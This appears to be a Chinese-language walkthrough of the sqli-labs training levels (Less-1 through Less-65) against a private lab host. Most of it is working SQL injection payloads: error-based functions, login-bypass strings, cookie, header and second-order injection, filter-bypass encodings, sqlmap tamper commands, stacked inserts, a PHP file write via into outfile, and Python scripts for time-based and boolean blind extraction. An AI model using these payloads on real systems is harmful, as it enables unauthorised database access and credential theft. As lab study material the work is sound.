# 重要知识点

# 10 种常见报错函数

'and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)-- 
 'and extractvalue(1,concat(0x7e,(select(database()))))-- 
 'or EXP(~(SELECT(*)from(select(database())a))#
 'or (select 2 from (select count(*),concat(database(),floor(rand(0)*2)) x from information_schema.tables group by x) a)#
 'and GeometryCollection((select * from (select * from(select database())a)b))#
 'and polygon((select * from(select * from(select database())a)b))#
 'and multipoint((select * from(select * from(select database())a)b))#
 'and multilinestring((select * from(select * from(select database())a)b))#
 'and LINESTRING((select * from(select * from(select database())a)b))#
 'and multipolygon((select * from(select * from(select database())a)b))#

# 时间盲注脚本

import requests
from datetime import datetime
import time

# Time-based blind extraction script aimed at the local lab target (the
# private 192.168.x address in `url`).  For every character position it
# tries each symbol of `strs`; a request whose round trip lasted at least one
# whole second (the injected `sleep(1.5)` having fired) is taken as a match.
# From the server side this is a burst of GETs on the same `id` parameter,
# differing only in the compared byte, each carrying ~1.5 s of induced
# latency -- the pattern a latency monitor or WAF would key on.
strs = '}abcdefghijklmnopqrstuvwxyz-{0123456789'
url = 'http://192.168.183.129:8082/Less-9/?id='
table_name = ''
print('[+] 开始盲注')
for pos in range(1, 10):
    for ch in strs:
        started = datetime.now()
        # Equality test on the ASCII code of the character at `pos`,
        # delaying the reply by 1.5 s when it holds.
        payload = (
            f"1' and if(ascii(substr(database(),{pos},1))={ord(ch)},"
            "sleep(1.5),1)--+"
        )
        requests.get(url + payload)
        elapsed = datetime.now() - started
        # timedelta.seconds is the whole-second component (truncated), so
        # only a delay of at least one full second counts as a hit.
        if elapsed.seconds >= 1:
            table_name += ch
            print(f'[*] 成功盲注第{pos}位,字符为{ch}')
            break
    time.sleep(0.5)
print(f'[+] 盲注结束,结果为{table_name}')

# 布尔盲注脚本

import requests

# Boolean-based blind extraction against the local lab login form (the
# private 192.168.x address in `url`).  Each character is located by binary
# search on its ASCII code within [32, 127): a response containing 'flag'
# means the injected `>` comparison evaluated true.
url = 'http://192.168.183.129:8082/Less-15/'
result = ''
for x in range(1, 50):
    hi, lo = 127, 32
    mid = (lo + hi) // 2
    while hi > lo:
        # `uname` carries the injected comparison; the remaining fields are
        # only what the form expects.
        form = {
            "uname": "1'or if(ascii(substr((select(database())),%d,1))>%d,1,0)#" % (x, mid),
            "passwd": "123",
            "submit": "Submit",
        }
        page = requests.post(url, data=form).text
        if 'flag' in page:
            lo = mid + 1
        else:
            hi = mid
        mid = (lo + hi) // 2
    # Loop exits with hi == lo, so `mid` is the resolved code point.
    result += chr(mid)
    print(result)

# 常用 sql 查询语句

查库
select(database())
查表
select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())
查字段
select(group_concat(column_name))from(information_schema.columns)where(table_name)like('users')
查数据
select(group_concat(password))from(users)where(username='secure')
查看数据库
show databases;
查看该数据库的数据表
show tables;
查看该数据表的结构
desc xxx;
查找某个数据表的所有内容
select * from xxx;

# 解题过程

# Less-1

注释符 用 --+

爆出数据库名

?id=11111111 'and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)--+
其他报错exp
?id=11111111 'and extractvalue(1,concat(0x7e,(select(database()))))--+

image-20210719121945157

爆出表名

?id=11111111 'and updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1)--+

image-20210719122023673

爆出字段名

11111111 'and updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('users')),0x7e),1)--+

image-20210719122037560

查询 secure 的密码

?id=11111111 'and updatexml(1,concat(0x7e,(select(group_concat(password))from(users)where(username='secure')),0x7e),1)--+

image-20210719122501403

# Less-2

跟 Less-1 步骤一样,只是不需要引号来闭合,略微有点不同。

?id=11111111 and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)--+
?id=11111111 and updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1)--+
11111111 and updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('users')),0x7e),1)--+
?id=11111111 and updatexml(1,concat(0x7e,(select(group_concat(password))from(users)where(username='secure')),0x7e),1)--+

# Less-3

跟 less-1 差不多。猜测后端语句为

select username,password from users where id = ('$id')

同样的操作

?id=11111111') and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)--+
?id=11111111') and updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1)--+
?id=11111111') and updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('users')),0x7e),1)--+
?id=11111111') and updatexml(1,concat(0x7e,(select(group_concat(password))from(users)where(username='secure')),0x7e),1)--+

# Less-4

双引号 + 括号,闭合语句。--+ 为注释。只验证存在注入就足够了,因为后续的操作都是一样的。

?id=11111111") and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)--+

image-20210719145850158

# Less-5

单引号闭合语句。只验证存在注入就足够了,因为后续的操作都是一样的。

?id=99999999992'and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)--+

image-20210719150100808

# Less-6

双引号闭合语句,报错注入

?id=1"and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)--+

image-20210719150229433

# Less-7

写出文件,前提是 secure_file_priv 不为 NULL,且目录可写。

111')) union select 1,"<?php phpinfo();?>",2 into outfile "/var/www/html/test/3.txt"--+

image-20210720102710532

虽然提示语法报错,但文件已经写出来了。

image-20210720102641833

# Less-8

布尔盲注 ,时间盲注都可以

布尔盲注脚本如下

import requests

# Boolean-based blind extraction on the lab's GET endpoint (the private
# 192.168.x address in `url`).  Binary search on the ASCII code of each
# character; 'You are in' in the response marks the true branch.
url = 'http://192.168.183.129:8082/Less-8/?id='
result = ''
for x in range(1, 50):
    hi, lo = 127, 32
    mid = (lo + hi) // 2
    while hi > lo:
        payload = "1' and ascii(substr((select group_concat(username) from users),%d,1))>%d--+" % (x, mid)
        page = requests.get(url + payload).text
        if 'You are in' in page:
            lo = mid + 1
        else:
            hi = mid
        mid = (lo + hi) // 2
    # hi == lo on exit, so `mid` is the resolved code point.
    result += chr(mid)
    print(result)

image-20210719170316263

时间盲注脚本如下

import requests
from datetime import datetime
import time

# Time-based blind extraction script for the local lab target (the private
# 192.168.x address in `url`); same shape as the Less-9 variant but with a
# 0.3 s sleep in the injected condition.
# NOTE(review): the payload sleeps 0.3 s while the check below requires
# elapsed.seconds >= 2, so a hit can only register through extra network
# delay -- confirm which threshold was intended.
strs = '}abcdefghijklmnopqrstuvwxyz-{0123456789'
url = 'http://192.168.183.129:8082/Less-8/?id='
table_name = ''
print('[+] 开始盲注')
for pos in range(1, 10):
    for ch in strs:
        started = datetime.now()
        payload = (
            f"1' or if(ascii(substr(database(),{pos},1))={ord(ch)},"
            "sleep(0.3),1)--+"
        )
        requests.get(url + payload)
        elapsed = datetime.now() - started
        # timedelta.seconds is the truncated whole-second component.
        if elapsed.seconds >= 2:
            table_name += ch
            print(f'[*] 成功盲注第{pos}位,字符为{ch}')
            break
    time.sleep(0.5)
print(f'[+] 盲注结束,结果为{table_name}')

image-20210719173529999

# Less-9

?id=1' and if (1=1,sleep (1),1)--+ 测试会有延时。

时间盲注脚本

import requests
from datetime import datetime
import time

# Time-based blind extraction script aimed at the local lab target (the
# private 192.168.x address in `url`).  For every character position it
# tries each symbol of `strs`; a request whose round trip lasted at least one
# whole second (the injected `sleep(1.5)` having fired) is taken as a match.
# Server-side this is a burst of GETs on the same `id` parameter, differing
# only in the compared byte, each with ~1.5 s of induced latency.
strs = '}abcdefghijklmnopqrstuvwxyz-{0123456789'
url = 'http://192.168.183.129:8082/Less-9/?id='
table_name = ''
print('[+] 开始盲注')
for pos in range(1, 10):
    for ch in strs:
        started = datetime.now()
        payload = (
            f"1' and if(ascii(substr(database(),{pos},1))={ord(ch)},"
            "sleep(1.5),1)--+"
        )
        requests.get(url + payload)
        elapsed = datetime.now() - started
        # timedelta.seconds is the whole-second component (truncated), so
        # only a delay of at least one full second counts as a hit.
        if elapsed.seconds >= 1:
            table_name += ch
            print(f'[*] 成功盲注第{pos}位,字符为{ch}')
            break
    time.sleep(0.5)
print(f'[+] 盲注结束,结果为{table_name}')

image-20210720112718743

# Less-10

脚本基本一样,把 Less-9 脚本语句里的单引号改成双引号即可。

import requests
from datetime import datetime
import time

# Time-based blind extraction script for the local lab target (the private
# 192.168.x address in `url`).  Identical to the Less-9 script except that
# the injected condition closes a double-quoted string instead of a
# single-quoted one.
strs = '}abcdefghijklmnopqrstuvwxyz-{0123456789'
url = 'http://192.168.183.129:8082/Less-10/?id='
table_name = ''
print('[+] 开始盲注')
for pos in range(1, 10):
    for ch in strs:
        started = datetime.now()
        payload = (
            f'1" and if(ascii(substr(database(),{pos},1))={ord(ch)},'
            'sleep(1.5),1)--+'
        )
        requests.get(url + payload)
        elapsed = datetime.now() - started
        # timedelta.seconds is the truncated whole-second component, so only
        # a delay of at least one full second counts as a hit.
        if elapsed.seconds >= 1:
            table_name += ch
            print(f'[*] 成功盲注第{pos}位,字符为{ch}')
            break
    time.sleep(0.5)
print(f'[+] 盲注结束,结果为{table_name}')

image-20210720113357657

# Less-11

在账号框输入 123' 会报错,并能看见 SQL 查询语句。

image-20210720114828037

构造万能密码,即可绕过登录。

admin'or 1=1-- 
密码随便输入

image-20210720115020264

联合注入

222'union select database(),3#

image-20210726111307900

# Less-12

构造万能密码,即可绕过登录。

11")or 1=1-- 

123

image-20210720121805698

联合注入

222")union select database(),3#

image-20210720134817205

# Less-13

构造万能密码,即可绕过登录。

admin')or 1=1-- 
123

image-20210720122049833

布尔盲注,爆数据

import requests

# Boolean-based blind extraction against the local lab login form (the
# private 192.168.x address in `url`).  Binary search on the ASCII code of
# each character in [32, 127); 'flag' in the response marks the true branch.
url = 'http://192.168.183.129:8082/Less-13/'
result = ''
for x in range(1, 50):
    hi, lo = 127, 32
    mid = (lo + hi) // 2
    while hi > lo:
        # `uname` carries the injected comparison; the remaining fields are
        # only what the form expects.
        form = {
            "uname": "1')or if(ascii(substr((select(database())),%d,1))>%d,1,0)#" % (x, mid),
            "passwd": "123",
            "submit": "Submit",
        }
        page = requests.post(url, data=form).text
        if 'flag' in page:
            lo = mid + 1
        else:
            hi = mid
        mid = (lo + hi) // 2
    # hi == lo on exit, so `mid` is the resolved code point.
    result += chr(mid)
    print(result)

image-20210720143230575

# Less-14

构造万能密码,即可绕过登录。

admin"or 1=1#
123

image-20210720122440141

布尔盲注

payload = '''1"or if(ascii(substr((select(database())),%d,1))>%d,1,0)#''' % (x, mid)

image-20210720143432433

# Less-15

绕过登录
admin'or 1=1-- 
123



布尔盲注
 payload = '''1'or if(ascii(substr((select(database())),%d,1))>%d,1,0)#''' % (x, mid)

# Less-16

能万能密码登录的,都可以布尔盲注,不做代码例子了。

image-20210720151712684

# Less-17

报错注入

 'and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)-- 
其他方式
 'and extractvalue(1,concat(0x7e,(select(database()))))-- 
 'or EXP(~(SELECT * from(select database())a))#
 'or (select 2 from (select count(*),concat(database(),floor(rand(0)*2)) x from information_schema.tables group by x) a)#
 'and GeometryCollection((select * from (select * from(select database())a)b))#
 'and polygon((select * from(select * from(select database())a)b))#
 'and multipoint((select * from(select * from(select database())a)b))#
 'and multilinestring((select * from(select * from(select database())a)b))#
 'and LINESTRING((select * from(select * from(select database())a)b))#
 'and multipolygon((select * from(select * from(select database())a)b))#

image-20210720153210849

# Less-18

账号密码输入 admin 123456

header 中 UA 注入

 User-Agent:ing' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '

image-20210720161131373

# Less-19

header 中 referer 注入

账号密码输入 admin 123456

Referer : ing' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '

# Less-20

cookie 注入

正常登录后,会提示 cookie 的格式。

image-20210720164906255

构造一下 cookie 即可注入

uname=admin'and extractvalue(1,concat(0x7e,(select(database()))))#

image-20210720165034353

# Less-21

对 cookie 进行 base64 编码,就能注入了。

raw
uname=admin')and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)or ('
base64
uname=YWRtaW4nKWFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoU0VMRUNUKGRhdGFiYXNlKCkpKSwweDdlKSwxKW9yICgn

image-20210721102505661

# Less-22

对 cookie 进行 base64 编码,双引号闭合

raw 
uname=admin"and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)#
base64
uname=YWRtaW4iYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChTRUxFQ1QoZGF0YWJhc2UoKSkpLDB4N2UpLDEpIw==

image-20210721104142087

# Less-23

题目有过滤 -- 和 # , 只能闭合引号来实现语句的正常运行。

?id=1123'union select 1,database(),3 or '

image-20210721112405016

# Less-24

二次注入

我们的步骤是

1. 注册一个 admin'# 的账号,并登录

image-20210721175525319

2. 修改该帐号的密码,此时修改的就是 admin 的密码,我修改为 123456。

Sql 语句变为 UPDATE users SET passwd="New_Pass" WHERE username =' admin' # ' AND password='

也就是执行了 UPDATE users SET passwd="New_Pass" WHERE username =' admin'

成功的话跳转页面会提示 Password successfully updated

3. 用刚修改的密码我的是 123456,登陆 admin 管理员账号,就可以成功登陆。

image-20210721180555122

# Less-25

过滤 or 可以双写绕过

联合注入
?id=100'union select 1,database(),3--+

万能密码
?id=100'oorr 1=1--+

# Less-26

绕过空格

(1)双空格
(2)/**/
(3)用括号绕过
(4)用回车代替 //ascii码为chr(13)&chr(10),url编码为%0d  %0a
 (5)%20 %09 %0a %0b %0c %0d %a0 %00  

%09 TAB键(水平)

%0a 新建一行

%0c 新的一页

%0d return功能

%0b TAB键(垂直)

%a0 空格

?id=1111%27uNion%a0sElect(1),(database()),(4)%a0oorr%a0(1)=%271
?id=1111%27uNion%0BsElect(1),(database()),(4)%a0oorr%a0(1)=%271

sqlmap

python sqlmap.py -u http://192.168.183.129:8082/Less-26/?id=1 -proxy=http://127.0.0.1:8080 --tamper doublewords.py,space2a0.py --prefix "'" --suffix "%a0or%a0(1)=%271" --dbms mysql --batch -v 0 --tech E --dbs

image-20210722102513979

# Less-27

%a0 绕过空格,大小写绕过关键字,用 or '1'='1 闭合后边。

?id=999%27unioN%a0selecT%a01,database(),3%a0or%a0%271%27=%271

sqlmap

python sqlmap.py -u http://192.168.183.129:8082/Less-27/?id=1 -proxy=http://127.0.0.1:8080 --tamper randomcase.py,space2a0.py --prefix "'" --suffix "%a0or%a0(1)=%271" --dbms mysql --batch -v 0 -tech E --dbs

# Less-27a

双引号闭合

?id=111%22uNion%a0sELect%a01,database(),%223

# Less-28

盲注 payload

?id=1')and(length(database())>7)and('1')=('1
?id=1')and(length(database())>8)and('1')=('1

# Less-28a

联合注入 payload

?id=1111%27)uNion%a0sElect(1),(database()),(4)%a0or%a0(%271%27)=(%271

盲注 payload

?id=1')and(length(database())>7)and('1')=('1
?id=1')and(length(database())>8)and('1')=('1

# Less-29,30,31

都是同一种类型,http 参数污染。

我们输入的参数会先经过 WAF 检测,检测正常后才转发给我们需要访问的页面(下面那篇文章有写到)。这里我传了 2 个同名的值:一个是用来欺骗 WAF 的,另一个才是真正给我们需要访问的页面的。

看一下这篇博客,http://blog.csdn.net/nzjdsds/article/details/77758824

联合注入 payload

?id=1&id=-1' union select 1,2,database()--+

# Less-32

Bypass addslashes()

宽字节注入解析

payload

?id=111%df%27%20union%20select%201,2,database()--+

# Less-33

payload

?id=111%df%27%20union%20select%201,2,database()--+

# Less-34

改为 post 提交,跟 33 一样

uname=111%df%27%20union%20select%201,database()--+&passwd=1&submit=Submit

# Less-35

整数型注入,不出现引号,就绕过了。非要用引号时,拿 16 进制代替绕过

 union select 1,database(),2--+

# Less-36

同 33

?id=111%df%27%20union%20select%201,2,database()--+

# Less-37

同 34

uname=111%df%27%20union%20select%201,database()--+&passwd=1&submit=Submit

# Less-38

堆叠注入详细介绍

?id=1';insert into users(id,username,password)values(20,'zeroc','2021')--+
?id=20

# Less-39

同 38 去掉单引号

?id=1;insert into users(id,username,password)values(20,'zeroc','2021')--+
?id=21

# Less-40

')闭合

?id=1');insert into users(id,username,password)values(21,'zeroc','2021')--+
?id=22

# Less-41

?id=1;insert into users(id,username,password)values(22,'zeroc','2021')--+
?id=23

# Less-42

login_user=zeroc&login_password=1231';insert into users(id,username,password)values(29,'zerocd','2021');#&mysubmit=Login

之后登录zerocd  2021 就能进去了,说明存在堆叠注入

# Less-43

')闭合

login_user=zeroc&login_password=1231');insert into users(id,username,password)values(30,'zerocd','2021');#&mysubmit=Login

# Less-44

'闭合,删除了报错信息

login_user=zeroc&login_password=1231';insert into users(id,username,password)values(30,'zerocd','2021');#&mysubmit=Login

# Less-45

')闭合

login_user=zeroc&login_password=1231');insert into users(id,username,password)values(30,'zerocd','2021');#&mysubmit=Login

# Less-46

我们可以通过 asc 和 desc 查看返回数据是否相同来简单判断是否存在 order by 注入

?sort=1 desc
?sort=1 asc

根据返回内容,判断确实存在注入

order by 注入有很多种方式进行注入
比如:报错注入、盲注、异或注入。如果达到一定条件还可以联合注入
报错注入很简单:

?sort=1 and updatexml(1,concat(0x7e,(select database())),1)
?sort=1 procedure analyse(extractvalue(rand()*2,concat(0x3a,version())),1)  

延时:

?sort=1 and (If(ascii(substr(database(),1,1))=115,sleep(5),1))

布尔

?sort=rand(ascii(left(database(),1))=115)

# Less-47

引号闭合一下,同 46

?sort=1' and updatexml(1,concat(0x7e,(select database())),1) --+

# Less-48

报错注入无法使用了,可以其他方式。

延时:

?sort=1 and (If(ascii(substr(database(),1,1))=115,sleep(5),1))

布尔

?sort=rand(ascii(left(database(),1))=115)

# Less-49

延时

?sort=1' and (If(ascii(substr(database(),1,1))=115,sleep(5),1))--+

# Less-50

堆叠注入

?sort=1;create table test like users--+

image-20210722150844468

# Less-51

报错注入

?sort=1' and updatexml(1,concat(0x7e,(select database())),1) --+

# Less-52

1;create table test52 like users;%23

# Less-53

1';create table test53 like users;%23

# Less-54

查库

?id=-1%27%20union%20select%201,database(),%27

查表

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

查列

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='5LODAMXH0G

查数据

?id=-1' union select 1,group_concat(secret_AM6G),3 from 5LODAMXH0G%23

# Less-55

跟 54 一样,单引号改成括号闭合

查库

?id=-1) union select 1,database(),3%23

# Less-56

跟 54 一样,单引号改成单引号 + 括号闭合

查库

?id=-1') union select 1,database(),3%23

# Less-57

跟 54 一样,单引号改成双引号闭合

查库

?id=-1" union select 1,database(),3%23

# Less-58

报错注入

?id=0' and updatexml(1,concat(0x7e,(select database())),1)%23

# Less-59

报错注入同 58,变为数字型注入

?id=0 and updatexml(1,concat(0x7e,(select database())),1)%23

# Less-60

报错注入同 58,单引号闭合 变成 双引号 + 括号闭合

?id=0") and updatexml(1,concat(0x7e,(select database())),1)%23

# Less-61

报错注入同 58,单引号闭合 变成 单引号 + 括号 + 括号闭合

?id=0')) and updatexml(1,concat(0x7e,(select database())),1)%23

# Less-62

payload

?id=1') and ascii(substr((select database()),%d,1))>%d--+

布尔盲注

import requests

# Boolean-based blind extraction on the lab's GET endpoint (the private
# 192.168.x address in `url`); the query string, including `?id=`, is part
# of the payload.  Binary search on the ASCII code of each character in
# [32, 127); 'Angelina' in the response marks the true branch.
# NOTE(review): positions start at 13, presumably continuing an earlier run
# that already covered 1..12 -- confirm.
url = 'http://192.168.183.129:8082/Less-62/'
result = ''
for x in range(13, 20):
    hi, lo = 127, 32
    mid = (lo + hi) // 2
    while hi > lo:
        payload = "?id=1') and ascii(substr((select database()),%d,1))>%d--+" % (x, mid)
        page = requests.get(url + payload).text
        if 'Angelina' in page:
            lo = mid + 1
        else:
            hi = mid
        mid = (lo + hi) // 2
    # hi == lo on exit, so `mid` is the resolved code point.
    result += chr(mid)
    print(result)

# Less-63

同 62,闭合方式不一样。payload

?id=1' and ascii(substr((select database()),%d,1))>%d--+

# Less-64

同 62,闭合方式不一样。payload

?id=1)) and ascii(substr((select database()),%d,1))>%d --+

# Less-65

同 62,闭合方式不一样。payload

?id=1" and ascii(substr((select database()),%d,1))>%d and "1"="1